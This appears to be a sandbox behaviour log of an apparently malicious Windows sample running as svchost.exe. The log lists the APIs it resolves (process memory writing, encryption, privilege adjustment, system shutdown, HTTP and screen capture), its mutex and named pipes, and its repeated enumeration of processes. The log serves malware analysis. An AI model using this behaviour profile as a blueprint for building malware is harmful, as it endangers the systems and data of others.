| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = E58EFF540968A436E982FCFA1C0445A2 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create Pipe | pipe_name = pipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| File | Read | size = 4, size_out = 4 |
|
1 | |
| File | Write | size = 4 |
|
1 | |
| File | Write | size = 766 |
|
1 | |
| File | Create Pipe | pipe_name = \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| File | Read | size = 4, size_out = 4 |
|
1 | |
| File | Write | size = 4 |
|
2 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
